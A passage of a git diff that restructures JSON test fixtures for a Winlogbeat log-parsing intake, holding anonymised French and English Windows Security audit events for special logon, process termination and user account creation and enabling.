@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session 
:\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte 
:\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4689.json b/Beats/winlogbeat/tests/security_event_4689.json index e5beffcf5..22840d53c 100644 --- a/Beats/winlogbeat/tests/security_event_4689.json +++ b/Beats/winlogbeat/tests/security_event_4689.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin 
:\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"code\":\"4689\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:10:18.932Z\",\"action\":\"Process Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le 
processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json index 96e08b538..03a0543f5 100644 --- a/Beats/winlogbeat/tests/security_event_4720.json +++ b/Beats/winlogbeat/tests/security_event_4720.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Win
dows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD 
Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + } }, "expected": { "message": 
"{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Aud
it Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}",
diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json
index 94bd16fdf..99debf8cf 100644
--- a/Beats/winlogbeat/tests/security_event_4722.json
+++ b/Beats/winlogbeat/tests/security_event_4722.json
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account 
